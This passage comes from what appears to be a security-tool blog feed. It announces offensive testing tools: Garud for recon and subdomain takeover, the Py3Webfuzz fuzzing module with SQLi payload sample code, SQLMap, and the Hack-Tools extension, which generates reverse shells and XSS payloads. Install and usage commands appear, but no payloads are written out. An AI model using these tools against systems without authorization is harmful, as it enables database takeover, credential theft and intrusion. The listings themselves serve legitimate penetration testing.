href="https://github.com/Pithikos/C-Thread-Pool" rel="nofollow" target="_blank" title="https://github.com/Pithikos/C-Thread-Pool">https://github.com/Pithikos/C-Thread-Pool</a></p> </li> <li> <p>The 0d1n uses OpenBSD/NetBSD functions to work with strings some thing like strlcat() and strlcpy() to prevent buffer overflow.</p> </li> </ul> <br /><span style="font-size: large;"><b>Project Overview on cloc</b></span><br /> <pre><code>cooler@gentoo:~/codes$ cloc 0d1n/<br /> 937 text files.<br /> 532 unique files. <br /> 451 files ignored.<br /><br />-------------------------------------------------------------------------------<br />Language files blank comment code<br />-------------------------------------------------------------------------------<br />JavaScript 361 9951 15621 52178<br />C 51 4986 4967 26642<br />C/C++ Header 30 1184 2858 4295<br />CSS 10 434 369 2142<br />HTML 7 59 0 1616<br />TeX 2 52 4 206<br />Markdown 3 81 0 137<br />make 4 36 9 130<br />Bourne Shell 2 0 0 4<br />-------------------------------------------------------------------------------<br />SUM: 487 16835 23846 91213<br />-------------------------------------------------------------------------------<br /><br /></code></pre> <p>Read the docs, and help menu when you execute "0d1n" binary...</p> <p>Do you have any doubt about 0d1n? please create a issue in this repository, i can help you...</p> <br /><span style="font-size: large;"><b>To study old versions look this following:</b></span><br /> <p><a href="http://sourceforge.net/projects/odin-security-tool/files/?source=navbar" rel="nofollow" target="_blank" title="http://sourceforge.net/projects/odin-security-tool/files/?source=navbar">http://sourceforge.net/projects/odin-security-tool/files/?source=navbar</a></p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/CoolerVoid/0d1n" rel="nofollow" target="_blank" title="Download 0D1N">Download 0D1N</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-15369254715458756262020-11-16T08:30:00.017-03:002020-11-16T08:30:01.733-03:00Garud - An Automation Tool That Scans Sub-Domains, Sub-Domain Takeover And Then Filters Out XSS, SSTI, SSRF And More Injection Point Parameters<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-wKBpPH8MsMg/X7H1dmkHByI/AAAAAAAAUXI/KqSdwXPydfciODlnHodwI79xtKjvDAJ-QCNcBGAsYHQ/s1640/Garud_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="664" data-original-width="1640" height="260" src="https://1.bp.blogspot.com/-wKBpPH8MsMg/X7H1dmkHByI/AAAAAAAAUXI/KqSdwXPydfciODlnHodwI79xtKjvDAJ-QCNcBGAsYHQ/w640-h260/Garud_1.png" width="640" /></a></div><p><br /></p> <p>An <a href="https://www.kitploit.com/search/label/Automation" target="_blank" title="automation">automation</a> tool that scans sub-domains, sub-domain takeover and then filters out xss, ssti, ssrf and more <a href="https://www.kitploit.com/search/label/Injection" target="_blank" title="injection">injection</a> point parameters.<br /></p> <span><a name='more'></a></span><p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-fVMr1Ku8MW8/X7H1lqSCffI/AAAAAAAAUXM/2V67cq8GELovkQuBQuMNizD5F24BqyKzACNcBGAsYHQ/s800/Garud_2.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="571" data-original-width="800" height="456" src="https://1.bp.blogspot.com/-fVMr1Ku8MW8/X7H1lqSCffI/AAAAAAAAUXM/2V67cq8GELovkQuBQuMNizD5F24BqyKzACNcBGAsYHQ/w640-h456/Garud_2.gif" width="640" /></a></div><p><br /></p> <ul> <li> <strong>Requirements:</strong> Go Language, Python 2.7 or Python 3. </li> <li> <strong>System requirements:</strong> Recommended to run on vps with 1VCPU and 2GB ram. </li> <li> <strong>Tools used - You must need to install these tools to use this script</strong><br /> <ul> <li><a href="https://github.com/projectdiscovery/subfinder" rel="nofollow" target="_blank" title="SubFinder">SubFinder</a></li> <li><a href="https://github.com/aboul3la/Sublist3r" rel="nofollow" target="_blank" title="Sublist3r">Sublist3r</a></li> <li><a href="https://github.com/1ndianl33t/Gf-Patterns" rel="nofollow" target="_blank" title="GF Patterns">GF Patterns</a></li> <li><a href="https://github.com/lc/gau" rel="nofollow" target="_blank" title="Gau">Gau</a></li> <li><a href="https://github.com/LukaSikic/subzy" rel="nofollow" target="_blank" title="Subzy">Subzy</a></li> <li><a href="https://github.com/haccer/subjack" rel="nofollow" target="_blank" title="Subjack">Subjack</a>: save <a href="https://github.com/haccer/subjack/blob/master/fingerprints.json" rel="nofollow" target="_blank" title="fingerprints.json">fingerprints.json</a> file into ~/tools/ directory.</li> <li><a href="https://github.com/tomnomnom/assetfinder" rel="nofollow" target="_blank" title="Assetfinder">Assetfinder</a></li> <li><a href="https://github.com/projectdiscovery/httpx" rel="nofollow" target="_blank" title="HTTPX">HTTPX</a></li> <li><a href="https://github.com/tomnomnom/waybackurls" rel="nofollow" target="_blank" title="Waybackurls">Waybackurls</a></li> </ul> </li> <li> <strong>Installation</strong> </li> </ul> <div><pre><code>git clone https://github.com/R0X4R/Garud.git && cd Garud/ && chmod +x garud && mv garud /usr/local/bin/</code></pre></div> <ul> <li><strong>Usage</strong></li> </ul> <div><pre><code>garud -d target.com -f filename</code></pre></div> <br /><span style="font-size: large;"><b>About Garud</b></span><br /> <p>I made this tool to automate my recon and save my time. It really give me headache always type such command and then wait to complete one command and I type other command. So I collected some of the tools which is widely used in the <a href="https://www.kitploit.com/search/label/Bugbounty" target="_blank" title="bugbounty">bugbounty</a> field. In this script I used Assetfinder, get-titles, httprobe, subjack, subzy, sublister, gau and gf patterns.<br /> The script first enumerates all the <a href="https://www.kitploit.com/search/label/Subdomains" target="_blank" title="subdomains">subdomains</a> of the give target domain using assetfinder and sublister then filters all live domains from the whole subdomain list then it extarct titles of the subdomains using get-title then it scans for <a href="https://www.kitploit.com/search/label/Subdomain%20Takeover" target="_blank" title="subdomain takeover">subdomain takeover</a> using subjack and subzy. Then it uses gau to extract paramters of the given subdomains then it use gf patterns to filters xss, ssti, ssrf, sqli params from that given subdomains. Then it'll save all the output in a text file like target-xss.txt. </p> <br /><b>Thanks to the authors of the tools used in this script.</b><br /> <p><a href="https://github.com/aboul3la" rel="nofollow" target="_blank" title="@aboul3la">@aboul3la</a> <a href="https://github.com/tomnomnom" rel="nofollow" target="_blank" title="@tomnomnom">@tomnomnom</a> <a href="https://github.com/lc" rel="nofollow" target="_blank" title="@lc">@lc</a> <a href="https://github.com/LukaSikic" rel="nofollow" target="_blank" title="@LukaSikic">@LukaSikic</a> <a href="https://github.com/haccer" rel="nofollow" target="_blank" title="@haccer">@haccer</a></p> <p><strong>Warning:</strong> This code was originally created for personal use, it generates a substantial amount of traffic, please use with caution.</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/R0X4R/Garud" rel="nofollow" target="_blank" title="Download Garud">Download Garud</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-9208949521052695092020-11-10T17:30:00.014-03:002020-11-10T17:30:01.298-03:00Py3Webfuzz - A Python3 Module To Assist In Fuzzing Web Applications<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-orO-gUro2bw/X6iHNMtmu4I/AAAAAAAAUTs/SH8JlI7Z304rGtF9L2QJ0Jqu5mfyGH4DACNcBGAsYHQ/s1874/py3webfuzz_3_sqli-code-test.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="873" data-original-width="1874" height="298" src="https://1.bp.blogspot.com/-orO-gUro2bw/X6iHNMtmu4I/AAAAAAAAUTs/SH8JlI7Z304rGtF9L2QJ0Jqu5mfyGH4DACNcBGAsYHQ/w640-h298/py3webfuzz_3_sqli-code-test.gif" width="640" /></a></div><p><br /></p><div> <p>Based on pywebfuzz, Py3webfuzz is a Python3 module to assist in the identification of <a href="https://www.kitploit.com/search/label/vulnerabilities" target="_blank" title="vulnerabilities">vulnerabilities</a> in web applications, Web Services through brute force, fuzzing and analysis. The module does this by providing common testing values, generators and other utilities that would be helpful when fuzzing web applications, API <a href="https://www.kitploit.com/search/label/Endpoints" target="_blank" title="endpoints">endpoints</a> and developing web exploits.</p> <p>py3webfuzz has the fuzzdb and some other miscellaneous sources implemented in Python classes, methods and functions for ease of use. fuzzdb project is just a collection of values for testing. The point is to provide a pretty good selection of values from fuzzdb project and some others sources, cleaned up and available through Python3 classes, methods and namespaces. This makes it easier and handy when the time comes up to use these values in your own <a href="https://www.kitploit.com/search/label/Exploits" target="_blank" title="exploits">exploits</a> and PoC.</p> <p>Effort was made to match the names up similarly to the folders and values from the latest fuzzdb project. This effort can sometimes make for some ugly looking namespaces. This balance was struck so that familiarity with the fuzzdb project would cross over into the Python code. The exceptions come in with the replacement of hyphens with underscores.</p> <span><a name='more'></a></span><div><br /></div><b>INSTALLATION</b><br /> <p>Installation can be done in a couple of ways. If you want use virtual environment</p> <br /><span style="font-size: large;"><b>Using Python setuptools</b></span><br /> <p><a href="http://pypi.python.org/pypi/setuptools" rel="nofollow" target="_blank" title="http://pypi.python.org/pypi/setuptools">http://pypi.python.org/pypi/setuptools</a></p> <div><pre><code>$ git clone https://github.com/jangelesg/py3webfuzz.git<br />$ cd py3webfuzz/</code></pre></div> <p>You can run the supplied setup.py with the install command</p> <div><pre><code> $ python setup.py install</code></pre></div> <p>You can also use easy_install if that's what you do to manage your installed packages</p> <div><pre><code> $ easy_install py3webfuzz_VERSION.tar.gz</code></pre></div> <p>You can also point to the location where the tar.gz lives on the web</p> <div><pre><code> $ easy_install URL_package</code></pre></div> <p>You should be able to go.</p> <br /><span style="font-size: large;"><b>Use in your Code</b></span><br /> <ul> <li>Some test cases can be found within info sub folder</li> </ul> <div><pre><code># Accessing SQLi values and encode them for further use <br /># Import Library<br />from py3webfuzz import fuzzdb<br />from py3webfuzz import utils, encoderFuncs<br /># Instantiate a Class Object that give you access to a set of SQLi values<br />sqli_detect_payload = fuzzdb.Attack.AttackPayloads.SQLi.Detect()<br /># Getting Access to those values through a list<br />for index, payload in enumerate(sqli_detect_payload.Generic_SQLI):<br /> print(f"Payload: {index} Value: {payload}")<br /> # Using encoderFuncs you can get different handy encodings to develop exploits<br /> print(f"SQLi Char Encode: {encoderFuncs.sqlchar_encode(payload)}")</code></pre></div> <div><pre><code># Send HTTP request to your target<br /># Import Library<br />from py3webfuzz import utils<br /># Custome your target and Headers<br />location = "http://127.0.0.1:8080/WebGoat/start.mvc#lesson/WebGoatIntroduction.lesson"<br /> headers = {"Host": "ssl.scroogle.org", "User-Agent": \<br /> "Mozilla/4.0 (compatible; MSIE 4.01; AOL 4.0; Mac_68K)",<br /> "Content-Type": "application/x-www-form-urlencoded"}<br /># at this point you have a dic object with all the elements for your pentest<br /># "headers": response.headers, "content": response.content, "status_code": response.status_code,<br /># 'json': response.json, "text": response.text, "time": f"Total in seconds: {time}"<br />res = utils.make_request(location, headers=headers, method="get")<br /># print the response <br />print(res)</code></pre></div> <br /><span style="font-size: large;"><b>Demo</b></span><br /> <p><br /></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-az7VYJRZcDY/X6iHXZWqoUI/AAAAAAAAUTw/hdqJPLSXJa8tIddnEeE6STJkHppYih-jwCNcBGAsYHQ/s1874/py3webfuzz_3_sqli-code-test.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="873" data-original-width="1874" height="298" src="https://1.bp.blogspot.com/-az7VYJRZcDY/X6iHXZWqoUI/AAAAAAAAUTw/hdqJPLSXJa8tIddnEeE6STJkHppYih-jwCNcBGAsYHQ/w640-h298/py3webfuzz_3_sqli-code-test.gif" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-mUvhAHUfnZ4/X6iHXY-qKVI/AAAAAAAAUT0/VPG1veVDAfM9NscWCJ-hsEk1LurGsjpRQCNcBGAsYHQ/s1730/py3webfuzz_4_encode_functions.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="827" data-original-width="1730" height="306" src="https://1.bp.blogspot.com/-mUvhAHUfnZ4/X6iHXY-qKVI/AAAAAAAAUT0/VPG1veVDAfM9NscWCJ-hsEk1LurGsjpRQCNcBGAsYHQ/w640-h306/py3webfuzz_4_encode_functions.gif" width="640" /></a></div><br /><p></p> <p><b>FUTURE</b></p> <ul> <li>Uploading this module to the <a href="https://www.kitploit.com/search/label/Python%20Package" target="_blank" title="Python Package">Python Package</a> Index.</li> <li>Integrate features, classes , methods and values for Mobile Pentest</li> <li>Enhance the XSS, XXE, techniques throw some new features (Any ideas are welcome)</li> <li>Feature for Server-Side Template Injection</li> </ul> <div><br /></div><div><span style="font-size: large;"><b>Author</b></span><br /><ul><li>Jonathan Angeles @ex0day</li><li>Github: <a href="https://github.com/jangelesg/py3webfuzz" rel="nofollow" target="_blank" title="https://github.com/jangelesg/py3webfuzz">https://github.com/jangelesg/py3webfuzz</a></li></ul><br /><span style="font-size: large;"><b>Contributors</b></span><br /><ul><li>Nathan Hamiel @nathanhamiel</li></ul></div><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/jangelesg/py3webfuzz" rel="nofollow" target="_blank" title="Download Py3Webfuzz">Download Py3Webfuzz</a></span></b></div></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-82547047773801795722020-09-06T23:38:00.005-03:002020-09-06T23:38:58.876-03:00SQLMap v1.4.9 - Automatic SQL Injection And Database Takeover Tool<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-xgoFQ6OJ-j8/X1WdGd6e_bI/AAAAAAAATvw/5QJ7fp3Ozmc6bYOUpMQetfsC0rITDMZRQCNcBGAsYHQ/s1600/sqlmap.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="569" data-original-width="603" src="https://1.bp.blogspot.com/-xgoFQ6OJ-j8/X1WdGd6e_bI/AAAAAAAATvw/5QJ7fp3Ozmc6bYOUpMQetfsC0rITDMZRQCNcBGAsYHQ/s1600/sqlmap.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="text-align: justify;">
<b>SQLMap</b> is an open source <a href="http://www.kitploit.com/search/label/Penetration%20Testing%20Tool">penetration testing tool</a> that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful <a href="http://www.kitploit.com/search/label/Detection">detection</a> engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.</div>
<a name='more'></a><br />
<div style="text-align: justify;">
<b><span style="font-size: large;">Features</span></b></div>
<ul>
<li style="text-align: justify;">Full support for <strong>MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix</strong> database management systems.</li>
<li style="text-align: justify;">Full support for six SQL injection techniques: <strong>boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band</strong>.</li>
<li style="text-align: justify;">Support to <strong>directly connect to the database</strong> without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.</li>
<li style="text-align: justify;">Support to enumerate <strong>users, password hashes, privileges, roles, databases, tables and columns</strong>.</li>
<li style="text-align: justify;">Automatic recognition of password hash formats and support for <strong>cracking them using a dictionary-based attack</strong>.</li>
<li style="text-align: justify;">Support to <strong>dump database tables</strong> entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.</li>
<li style="text-align: justify;">Support to <strong>search for specific database names, specific tables across all databases or specific columns across all databases' tables</strong>. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain string like name and pass.</li>
<li style="text-align: justify;">Support to <strong>download and upload any file</strong> from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.</li>
<li style="text-align: justify;">Support to <strong>execute arbitrary commands and retrieve their standard output</strong> on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.</li>
<li style="text-align: justify;">Support to <strong>establish an out-of-band stateful TCP connection between the attacker machine and the database server</strong> underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.</li>
<li style="text-align: justify;">Support for <strong>database process' user privilege escalation</strong> via Metasploit's Meterpreter <code>getsystem</code> command.</li>
</ul>
<br />
<span style="font-size: large;"><b>Installation</b></span><br />
You can download the latest tarball by clicking <a href="https://github.com/sqlmapproject/sqlmap/tarball/master" rel="nofollow" target="_blank">here</a> or latest zipball by clicking <a href="https://github.com/sqlmapproject/sqlmap/zipball/master" rel="nofollow" target="_blank">here</a>.<br />
Preferably, you can download sqlmap by cloning the <a href="https://github.com/sqlmapproject/sqlmap" rel="nofollow" target="_blank">Git</a> repository:<br />
<pre><code>git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev</code></pre>
sqlmap works out of the box with <a href="http://www.python.org/download/" rel="nofollow" target="_blank">Python</a> version <strong>2.6.x</strong> and <strong>2.7.x</strong> on any platform.<br />
<br />
<span style="font-size: large;"><b>Usage</b></span><br />
To get a list of basic options and switches use:<br />
<pre><code>python sqlmap.py -h</code></pre>
To get a list of all options and switches use:<br />
<pre><code>python sqlmap.py -hh</code></pre>
You can find a sample run <a href="https://asciinema.org/a/46601" rel="nofollow" target="_blank">here</a>. To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the <a href="https://github.com/sqlmapproject/sqlmap/wiki/Usage" rel="nofollow" target="_blank">user's manual</a>.<br />
<br />
<span style="font-size: large;"><b>Links</b></span><br />
<ul>
<li>Homepage: <a href="http://sqlmap.org/" rel="nofollow" target="_blank">http://sqlmap.org</a></li>
<li>Download: <a href="https://github.com/sqlmapproject/sqlmap/tarball/master" rel="nofollow" target="_blank">.tar.gz</a> or <a href="https://github.com/sqlmapproject/sqlmap/zipball/master" rel="nofollow" target="_blank">.zip</a></li>
<li>Commits RSS feed: <a href="https://github.com/sqlmapproject/sqlmap/commits/master.atom" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/commits/master.atom</a></li>
<li>Issue tracker: <a href="https://github.com/sqlmapproject/sqlmap/issues" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/issues</a></li>
<li>User's manual: <a href="https://github.com/sqlmapproject/sqlmap/wiki" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki</a></li>
<li>Frequently Asked Questions (FAQ): <a href="https://github.com/sqlmapproject/sqlmap/wiki/FAQ" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki/FAQ</a></li>
<li>Twitter: <a href="https://twitter.com/sqlmap" rel="nofollow" target="_blank">@sqlmap</a></li>
<li>Demos: <a href="http://www.youtube.com/user/inquisb/videos" rel="nofollow" target="_blank">http://www.youtube.com/user/inquisb/videos</a></li>
<li>Screenshots: <a href="https://github.com/sqlmapproject/sqlmap/wiki/Screenshots" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki/Screenshots</a></li>
</ul>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/sqlmapproject/sqlmap" rel="nofollow" target="_blank">Download SQLMap v1.4.9</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-13893966694702630772020-08-26T17:30:00.001-04:002020-08-26T17:30:02.462-04:00Hack-Tools - The All-In-One Red Team Extension For Web Pentester<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-1AsbX1dD4VM/XzoTUt5PjlI/AAAAAAAATj4/c8jEPOuU9vYhphPyvr9u7kON_xFiV87QwCNcBGAsYHQ/s1600/Hack-Tools_7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1201" data-original-width="1600" height="480" src="https://1.bp.blogspot.com/-1AsbX1dD4VM/XzoTUt5PjlI/AAAAAAAATj4/c8jEPOuU9vYhphPyvr9u7kON_xFiV87QwCNcBGAsYHQ/s640/Hack-Tools_7.png" width="640" /></a></div>
<br />
<b>The all-in-one <a href="https://www.kitploit.com/search/label/Red%20Team" target="_blank" title="Red Team">Red Team</a> browser extension for <strong>Web Pentesters</strong></b><br />
HackTools, is a web extension facilitating your <strong>web application penetration tests</strong>, it includes <strong>cheat sheets</strong> as well as all the <strong>tools</strong> used during a test such as XSS payloads, Reverse shells and much more.<br />
With the extension you <strong>no longer need to search for payloads in different websites</strong> or in your local storage space, most of the tools are accessible in one click. HackTools is accessible either in <strong>pop up mode</strong> or in a whole tab in the <strong>Devtools</strong> part of the browser with F12.<br />
<a name='more'></a><br />
<b>Current functions:</b><br />
<ul>
<li>Dynamic Reverse Shell generator (PHP, Bash, Ruby, Python, Perl, Netcat)</li>
<li>Shell Spawning (TTY Shell Spawning)</li>
<li>XSS Payloads</li>
<li>Basic SQLi payloads</li>
<li>Local file inclusion payloads (LFI)</li>
<li>Base64 <a href="https://www.kitploit.com/search/label/Encoder" target="_blank" title="Encoder">Encoder</a> / Decoder</li>
<li>Hash <a href="https://www.kitploit.com/search/label/Generator" target="_blank" title="Generator">Generator</a> (MD5, SHA1, SHA256, SHA512)</li>
<li>Useful Linux commands (Port Forwarding, SUID)</li>
</ul>
<br />
<span style="font-size: large;"><b>Preview</b></span><br />
<div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-1AsbX1dD4VM/XzoTUt5PjlI/AAAAAAAATj4/c8jEPOuU9vYhphPyvr9u7kON_xFiV87QwCNcBGAsYHQ/s1600/Hack-Tools_7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1201" data-original-width="1600" height="480" src="https://1.bp.blogspot.com/-1AsbX1dD4VM/XzoTUt5PjlI/AAAAAAAATj4/c8jEPOuU9vYhphPyvr9u7kON_xFiV87QwCNcBGAsYHQ/s640/Hack-Tools_7.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-sJBz-Oqxi_A/XzoTUqkw53I/AAAAAAAATj8/cBNz0HeYppcI2w4iwX5OtB3UJn2f1NZogCNcBGAsYHQ/s1600/Hack-Tools_8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1201" data-original-width="1600" height="480" src="https://1.bp.blogspot.com/-sJBz-Oqxi_A/XzoTUqkw53I/AAAAAAAATj8/cBNz0HeYppcI2w4iwX5OtB3UJn2f1NZogCNcBGAsYHQ/s640/Hack-Tools_8.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-6pnw8d7KwLo/XzoTUh64JjI/AAAAAAAATj0/zpRwue8gFCUQoAuPA2eOKlYLC9xydzENQCNcBGAsYHQ/s1600/Hack-Tools_9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1201" data-original-width="1600" height="480" src="https://1.bp.blogspot.com/-6pnw8d7KwLo/XzoTUh64JjI/AAAAAAAATj0/zpRwue8gFCUQoAuPA2eOKlYLC9xydzENQCNcBGAsYHQ/s640/Hack-Tools_9.png" width="640" /></a></div>
</div>
<span style="font-size: large;"><b>Install the application</b></span><br />
<br />
<b>Chromium based browser</b><br />
All the available releases are <a href="https://github.com/LasCC/Hack-Tools/releases" rel="nofollow" target="_blank" title="here.">here.</a>.<br />
Otherwise, if you want to build the project yourself from the source code<br />
<br />
<b>Mozilla Firefox</b><br />
You can download <strong>HackTools</strong> on the Firefox browser <a href="https://www.kitploit.com/search/label/Add-ons" target="_blank" title="add-ons">add-ons</a> <a href="https://addons.mozilla.org/en-US/firefox/addon/hacktools/" rel="nofollow" target="_blank" title="here.">here.</a><br />
<br />
<span style="font-size: large;"><b>Build from source code</b></span><br />
<div>
<pre><code>yarn install && yarn build</code></pre>
</div>
Once the build is done correctly, webpack will create a new folder called <strong>dist</strong><br />
After that you need to go to the <strong>extension</strong> tab on your chrome based navigator and turn on the<br />
<strong><br /></strong>
<strong>developer mode</strong><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-wNG9pZ5VTzg/XzoTilI5psI/AAAAAAAATkA/UCUttWK_2rE0xKPlZ41oXsleOH8Eq0NnACNcBGAsYHQ/s1600/Hack-Tools_10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="130" data-original-width="287" src="https://1.bp.blogspot.com/-wNG9pZ5VTzg/XzoTilI5psI/AAAAAAAATkA/UCUttWK_2rE0xKPlZ41oXsleOH8Eq0NnACNcBGAsYHQ/s1600/Hack-Tools_10.png" /></a></div>
<br />
Then click on the <strong>load unpacked</strong> button in the top left corner<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-gHMtkLyI80Y/XzoTlwGPjtI/AAAAAAAATkM/CvqR6fgKgDwY7biC5Z705XeSa4QK9s7IACNcBGAsYHQ/s1600/Hack-Tools_11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="126" data-original-width="563" src="https://1.bp.blogspot.com/-gHMtkLyI80Y/XzoTlwGPjtI/AAAAAAAATkM/CvqR6fgKgDwY7biC5Z705XeSa4QK9s7IACNcBGAsYHQ/s1600/Hack-Tools_11.png" /></a></div>
<br />
Once you clicked on the button you just need to select the <strong>dist folder</strong> and that's it !<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-DcimhgAHTKk/XzoTpgm1qMI/AAAAAAAATkQ/-bnwcEMisHU1_EVYfVlluLnSYlvjKFG7gCNcBGAsYHQ/s1600/Hack-Tools_12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="455" data-original-width="802" height="363" src="https://1.bp.blogspot.com/-DcimhgAHTKk/XzoTpgm1qMI/AAAAAAAATkQ/-bnwcEMisHU1_EVYfVlluLnSYlvjKFG7gCNcBGAsYHQ/s640/Hack-Tools_12.png" width="640" /></a></div>
<br />
<span style="font-size: large;"><b>Authors</b></span><br />
<strong>Ludovic COULON & Riadh BOUCHAHOUA</strong><br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/LasCC/Hack-Tools" rel="nofollow" target="_blank" title="Download Hack-Tools">Download Hack-Tools</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-5363132670232250562020-01-01T17:17:00.000-03:002020-01-01T17:17:00.269-03:00SQLMap v1.4 - Automatic SQL Injection And Database Takeover Tool<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-kC0tV4bFZBE/Xgz3ynvucXI/AAAAAAAARVs/dV8i8SzFUPUWL-WbDbYVVWoRUrsHoAp2QCNcBGAsYHQ/s1600/sqlmap_1.4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="657" data-original-width="697" height="602" src="https://1.bp.blogspot.com/-kC0tV4bFZBE/Xgz3ynvucXI/AAAAAAAARVs/dV8i8SzFUPUWL-WbDbYVVWoRUrsHoAp2QCNcBGAsYHQ/s640/sqlmap_1.4.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="text-align: justify;">
<b>SQLMap</b> is an open source <a href="http://www.kitploit.com/search/label/Penetration%20Testing%20Tool">penetration testing tool</a> that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful <a href="http://www.kitploit.com/search/label/Detection">detection</a> engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.</div>
<a name='more'></a><br />
<div style="text-align: justify;">
<b><span style="font-size: large;">Features</span></b></div>
<ul>
<li style="text-align: justify;">Full support for <strong>MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix</strong> database management systems.</li>
<li style="text-align: justify;">Full support for six SQL injection techniques: <strong>boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band</strong>.</li>
<li style="text-align: justify;">Support to <strong>directly connect to the database</strong> without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.</li>
<li style="text-align: justify;">Support to enumerate <strong>users, password hashes, privileges, roles, databases, tables and columns</strong>.</li>
<li style="text-align: justify;">Automatic recognition of password hash formats and support for <strong>cracking them using a dictionary-based attack</strong>.</li>
<li style="text-align: justify;">Support to <strong>dump database tables</strong> entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.</li>
<li style="text-align: justify;">Support to <strong>search for specific database names, specific tables across all databases or specific columns across all databases' tables</strong>. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain string like name and pass.</li>
<li style="text-align: justify;">Support to <strong>download and upload any file</strong> from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.</li>
<li style="text-align: justify;">Support to <strong>execute arbitrary commands and retrieve their standard output</strong> on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.</li>
